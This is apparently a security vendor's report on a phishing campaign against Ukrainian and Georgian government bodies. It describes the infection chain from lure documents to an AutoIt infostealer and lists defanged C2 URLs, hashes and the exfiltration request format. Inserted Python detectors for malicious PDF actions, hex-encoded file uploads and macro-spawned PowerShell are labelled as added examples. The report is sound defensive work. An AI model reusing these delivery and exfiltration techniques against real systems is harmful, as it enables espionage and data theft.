In May 2021, Fortinet published a report about the early stages of an ongoing phishing attack against the Ukrainian government. The attack, initially based on the Saint Bot downloader, also targeted Georgia as reported by Malwarebytes. Since June we have seen this threat actor expand its operation with new samples targeting government entities in Georgia. In this report we will cover the new malware samples we found.
Method of Infection
The attack’s entry point is a spear phishing email referencing government-related topics including veterans, Ukraine’s Anti-Terrorist Operation (ATO), Georgia’s Internally Displaced Persons (IDPs), organizations in Georgia’s private sector and COVID-19. The attack mainly targets government agencies in Ukraine and Georgia.
The main payload delivered by the malware is an infostealer written in AutoIt. Its main goal is to steal files from the victim’s machine, uploading them to a predefined Command and control (C2) server.
Based on victimology and the fact that this attack tries to steal files from government entities, a classic goal of nation-state groups, it is likely operated by a Russian nation-state. There are also several similarities between this attack and past APT28 campaigns which we will discuss later.
Below we summarize the early stages of the attack and show the latest malware targeting government entities in Georgia. We assess with high confidence that this attack may expand its operations to target additional Eastern European countries.
The attack flow, described below, begins with a phishing email containing a malicious shortened URL. The URL redirects to a Command and control (C2) where a ZIP file or malicious document is hosted. The ZIP file contains a malicious file and in some emails also a harmless PDF file.
The malicious attachment varies between RTF, DOC, PDF, JS, LNK or EXE. Its main goal is to drop the packed payloads from the C2. The method in which a dropper contacts the C2 in order to deliver the packed payload varies between the different file types and stages of the attack. The packed executable loads an AutoIt payload into memory. The payload searches for files on the victim’s machine based on a list of file extensions and uploads them to a C2 that is hardcoded in the script.
An example of one of the phishing emails sent to the Ukrainian government is below. The threat actor references payments made to veterans of the Anti-Terrorist Operation (ATO).
Phishing email sent to the Ukrainian government. Translation from Ukrainian – Subject: “Payments to ATO Veterans.” Content: “It must be filled in and sent back.”
The link, disguised as a Ukrainian .gov domain, is actually a shortened URL (https[://]cutt[.]ly/WcBTVdf) that leads to http[://]gosloto[.]site/doc/form_request.doc and downloads form_request.doc to the victim’s machine. Despite its extension, this document is an RTF file that, once opened, displays content about the Merkava, the main battle tank used by the Israel Defense Forces.
Reference to Israeli Merkava in the RTF file.
This file is in charge of fetching the final payload from the C2. In other phishing emails, this file is named NATO_06042021 (44697aad796c0d82c1adbee15fd1266b).
First we Take Kyiv, then we Take Tbilisi
Combined with continuous attacks against Ukraine, the threat actor has expanded its campaign to target government entities in Georgia. The following malicious documents were uploaded to VirusTotal from Georgia on June 17 and July 5.
2021-2022 Strategy Action Plan for IDPs.doc (translated from Georgian)
Change to 828.doc (translated from Georgian)
All three files (the PDF and the two Word documents) have low detection rates in VirusTotal at the time of this writing. In the following sections we describe each file’s behavior.
b56975725c4e260370af540f9c0b6709 in VirusTotal.
The PDF File
The PDF file, named “Georgia_Private_Sector_Poster_Inputs_06_2021.pdf,” was uploaded to VirusTotal on June 17, 2021.
The PDF contains an action object. When a victim opens the PDF, the action sends a query to Google whose parameters contain the C2 URL:
The PDF reader displays a security warning asking the user to allow the document to contact “http[:]//www.google.com.”
Action object in b56975725c4e260370af540f9c0b6709
System prompt message.
Once the document connects to Google, a short chain of network redirections follows. First, Google redirects to the C2 URL. Then, as shown in the image below, the C2 page contains a frame whose src points to another C2 URL (https[://]16868138130[.]space/000/), which in turn redirects via a meta refresh to a shortened URL (https[://]qaz[.]im/load/rKtsZD/hDKKFD). This final hop drops georgia_private_sector_poster_inputs_06_2021.cpl (02f0118bd15dabf727659b9fd27c86c9).
Network redirections for delivering the payload.
This redirection chain, which starts with Google as the first domain the PDF contacts, is a straightforward antivirus evasion technique: the only URL visible inside the document is a trusted one.
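A defender's triage check for the PDF technique described above, added here as an example and not part of the original report: it scans raw PDF bytes for automatic triggers (/OpenAction, /AA) combined with outward-reaching action types and extracts any /URI targets. The embedded PDF is constructed for this example (it is not the b56975725c4e260370af540f9c0b6709 sample) and the second-hop URL in it is a placeholder.

```python
import re

# Constructed minimal PDF for this example: an /OpenAction whose /URI sends the
# reader to Google with the next hop in the query string, which is the shape the
# report describes. The c2.example.invalid host is a placeholder.
SAMPLE_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj
4 0 obj << /S /URI /URI (http://www.google.com/url?q=http://c2.example.invalid/) >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

# Automatic triggers: document-open action and additional-action dictionaries.
AUTO_RE = re.compile(rb"/(OpenAction|AA)\b")
# Action subtypes that reach outside the document or run code.
ACTION_RE = re.compile(rb"/S\s*/(URI|Launch|JavaScript|SubmitForm|GoToR)\b")
URI_RE = re.compile(rb"/URI\s*\(([^)]*)\)")


def scan_pdf_actions(pdf: bytes) -> dict:
    """Return the automatic triggers, action types and URIs found in raw PDF bytes.

    Caveat: this inspects the raw file only. Objects inside compressed object
    streams (/ObjStm) or encrypted documents are not seen; decompress first.
    """
    triggers = sorted({m.group(1).decode() for m in AUTO_RE.finditer(pdf)})
    actions = sorted({m.group(1).decode() for m in ACTION_RE.finditer(pdf)})
    uris = [m.group(1).decode("latin-1") for m in URI_RE.finditer(pdf)]
    # Flag only when an action can fire without user interaction; a plain
    # link annotation with /URI is common in benign documents.
    suspicious = bool(triggers) and bool(actions)
    return {"triggers": triggers, "actions": actions, "uris": uris, "suspicious": suspicious}


if __name__ == "__main__":
    print(scan_pdf_actions(SAMPLE_PDF))
```

The extracted URI list is what an analyst would feed to a URL sandbox to follow the redirect chain; the Google hop itself is benign, the query parameter is the indicator.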
georgia_private_sector_poster_inputs_06_2021.cpl is a DLL that, when the user double-clicks it, runs inside the trusted Control Panel process. The DLL is in charge of downloading and running the packed payload from the C2, 16868138130[.]space/000/000.exe (41af4d9fbd0bc719212b78cd7a1b89ec). The packed malware loads the AutoIt payload into memory.
The AutoIt script’s main goal is to upload files from the victim’s machine to a predefined C2. The main logic (see image below) calls the _filsearch function (second image below), which looks for files with the following extensions:
_filsearch uses the @ComSpec macro (which usually points to cmd.exe). The process tree created by the AutoIt file is shown below.
Code snippet from the AutoIt script main logic.
Code snippet from the AutoIt script _filsearch function.
Process tree snippet in Intezer Analyze.
Each file is uploaded to the C2 in a multipart/form-data POST request, with the file’s path sent hex-encoded. An example of a file upload request is shown below.
Example of C_/Users/admin/AppData/Roaming/Microsoft/Windows/Cookies/NUT28OOW.txt file upload.
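Network-side detection for the upload format described above, added here as an example and not code from the report: it parses a multipart/form-data POST and flags any form field that is pure hex and decodes to a Windows-style path. The request is constructed for this example; the field names "path" and "file", the boundary, the host and the endpoint are assumptions, only the hex-encoded path and the multipart shape follow the report.

```python
import binascii
import re

# Constructed request for this example; field names, boundary and host are assumptions.
SAMPLE_REQUEST = b"".join([
    b"POST /upload.php HTTP/1.1\r\n",
    b"Host: c2.example.invalid\r\n",
    b"Content-Type: multipart/form-data; boundary=----ab12\r\n\r\n",
    b"------ab12\r\nContent-Disposition: form-data; name=\"path\"\r\n\r\n",
    binascii.hexlify(b"C_/Users/admin/AppData/Roaming/Microsoft/Windows/Cookies/NUT28OOW.txt"),
    b"\r\n------ab12\r\nContent-Disposition: form-data; name=\"file\"; filename=\"NUT28OOW.txt\"\r\n",
    b"Content-Type: application/octet-stream\r\n\r\nconstructed cookie contents\r\n",
    b"------ab12--\r\n",
])

HEX_RE = re.compile(rb"^(?:[0-9a-fA-F]{2})+$")
# Windows path after decoding: drive letter, ':' or '_' (the sample shows "C_/"), separator.
PATH_RE = re.compile(r"^[A-Za-z][:_][\\/]")


def parse_multipart(raw: bytes) -> list:
    """Split a raw multipart/form-data request into (field name, content) pairs."""
    head, _, body = raw.partition(b"\r\n\r\n")
    m = re.search(rb"boundary=([^\r\n;]+)", head)
    if not m:
        return []
    boundary = b"--" + m.group(1).strip()
    parts = []
    for chunk in body.split(boundary)[1:]:
        if chunk.startswith(b"--"):
            break  # closing boundary
        hdrs, _, content = chunk.lstrip(b"\r\n").partition(b"\r\n\r\n")
        name = re.search(rb'name="([^"]*)"', hdrs)
        parts.append((name.group(1).decode() if name else "", content.rstrip(b"\r\n")))
    return parts


def hex_encoded_paths(raw: bytes) -> list:
    """Return every form field that is pure hex and decodes to a Windows-style path."""
    found = []
    for _name, content in parse_multipart(raw):
        if not HEX_RE.match(content):
            continue
        try:
            text = binascii.unhexlify(content).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue
        if PATH_RE.match(text):
            found.append(text)
    return found
```

A non-empty result from hex_encoded_paths on an outbound POST to an unknown host is a strong exfiltration signal, since legitimate upload forms rarely hex-encode a local path.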
Lastly, the AutoIt script creates and runs a batch file named “r.bat” which deletes the malware from disk and kills its process.
The Document Files
Both malicious Word documents uploaded to VirusTotal on July 5 behave similarly. Let’s look at 900e892c8151f0f59a93af1206583ce6. Once a user opens this document, it runs a VBA macro whose main logic creates, writes to and runs a batch file named “ballDemocrat.bat.” The batch file runs a PowerShell command that downloads an executable from the C2 (http[://]1221[.]site/15858415841/0407.exe) and saves it as centuryarticle.exe.
VBA script (7546f382d73231a4c1fdc58ab1535ec0) in the malicious document.
Process tree of 900e892c8151f0f59a93af1206583ce6
The file downloaded from the C2 is a packed .NET executable that loads the AutoIt payload into memory.
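Endpoint-side detection for the macro chain described above (Word, batch file, PowerShell, dropped executable), added here as an example and not code from the report: it walks constructed process-creation events and flags a cmd.exe that runs a .bat from a user-writable directory under an Office ancestor and then spawns PowerShell. The pids, the user name and the batch file location are assumptions; ballDemocrat.bat and centuryarticle.exe are the names given in the report, and the PowerShell arguments are deliberately not reproduced.

```python
OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\")

# Constructed process-creation events: (pid, parent pid, image, command line).
# The pids, user name and paths are assumptions; the chain shape follows the report.
EVENTS = [
    (100, 1, "explorer.exe", "explorer.exe"),
    (200, 100, "winword.exe", 'winword.exe "C:\\Users\\u\\Downloads\\Change to 828.doc"'),
    (300, 200, "cmd.exe", 'cmd.exe /c "C:\\Users\\u\\AppData\\Local\\Temp\\ballDemocrat.bat"'),
    (400, 300, "powershell.exe", "powershell.exe -Command <omitted>"),
    (500, 400, "centuryarticle.exe", "C:\\Users\\u\\AppData\\Local\\Temp\\centuryarticle.exe"),
    (600, 100, "cmd.exe", "cmd.exe"),  # benign: a console the user opened from explorer
]


def ancestors(events, pid):
    """Yield the image names of pid's parents, nearest first."""
    by_pid = {e[0]: e for e in events}
    while pid in by_pid:
        pid = by_pid[pid][1]
        if pid in by_pid:
            yield by_pid[pid][2].lower()


def flag_office_batch_chains(events):
    """Return pids of cmd.exe processes that run a .bat from a user-writable
    directory, have an Office process as an ancestor and spawn PowerShell."""
    children = {}
    for _pid, ppid, image, _cmd in events:
        children.setdefault(ppid, []).append(image.lower())
    hits = []
    for pid, _ppid, image, cmdline in events:
        low = cmdline.lower()
        if image.lower() != "cmd.exe" or ".bat" not in low:
            continue
        if not any(d in low for d in USER_WRITABLE):
            continue
        if not any(a in OFFICE for a in ancestors(events, pid)):
            continue
        if "powershell.exe" in children.get(pid, []):
            hits.append(pid)
    return hits


if __name__ == "__main__":
    print(flag_office_batch_chains(EVENTS))
```

The same lineage rule maps directly onto Sysmon Event ID 1 or EDR process telemetry, where ParentImage and CommandLine are the fields to check.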
Possible Russian Connection
We noticed several similarities between this attack and Russia’s APT28 campaigns. While these similarities alone are not enough to attribute the attack to APT28, the victimology and the evident intent to conduct espionage against government entities in Eastern Europe give us reason to believe that Russia is behind it.
- Victimology: APT28 has targeted Ukraine and Georgia in the past.
- Phishing themes: APT28 previously used COVID-19-related phishing themes to target countries including Ukraine, and has also used NATO as a phishing theme.
- Use of AutoIt: one of the variants of Zebrocy (APT28 malware) is written in AutoIt.
- File search with predefined extensions: Zebrocy searches the victim machine for files with predefined extensions.
- Archives mixing malicious and benign files: a compressed file holding both was used in an APT28 COVID-19 phishing attack last year and in other past campaigns.
- URL shorteners: spear phishing emails containing a URL-shortener link were documented in past APT28 campaigns. In one of them, the shortened URL hosted a ZIP file containing a benign PDF and a malicious executable.
- Use of hex encoding: the Zebrocy AutoIt version uses string-to-hex encoding.
- Use of batch files, PowerShell and CMD: all are part of APT28’s documented TTPs.
Take the following precautions to protect your organization from phishing attacks.
- Enhance social engineering awareness within your organization.
- Use an email gateway to analyze attachments and links. Intezer Analyze now supports analysis for Microsoft Office documents, PDFs and scripts.
- Conduct proactive threat hunting on all endpoints inside your organization to routinely ensure that no traces of malicious code or malware exist in memory. Intezer’s live Endpoint Scanner can help you achieve this at scale by collecting all binaries running in memory, including fileless ones, and classifying them using Genetic Code Analysis technology. We also have a Volatility plugin for analyzing memory dumps.
AutoIt Payload Script
The AutoIt script can be found in the following GitHub repository.
Packed AutoIT Infostealer
- CNBC, Russian Hackers Target NATO, Military Secrets
- FireEye, APT28: A Window Into Russia’s Cyber Espionage Operations?
- Kaspersky, GreyEnergy’s Overlap with Zebrocy
- Intezer, A Zebra in Gopher’s Clothing: Russian APT Uses COVID-19 Lures to Deliver Zebrocy
- Quointelligence, APT28 Delivers Zebrocy Malware Campaign using NATO Theme as Lure
- ESET, Sednit Update: Analysis of Zebrocy
- VK-Intel, Let’s Learn: Progression of APT28 AutoIt Zebrocy Downloaders: Source-Code Level Analysis
- ESET, A Journey to Zebrocy Land
- ESET, Sednit: What’s Going on with Zebrocy?
- Brady, S. Indictment – United States vs Aleksei Sergeyevich Morenets, et al. Retrieved October 1, 2020
- Mueller, R. Indictment – United States of America vs. Viktor Borisovich Netyksho, et al. Retrieved September 13, 2018
- APT28 MITRE ATT&CK
- Zebrocy MITRE ATT&CK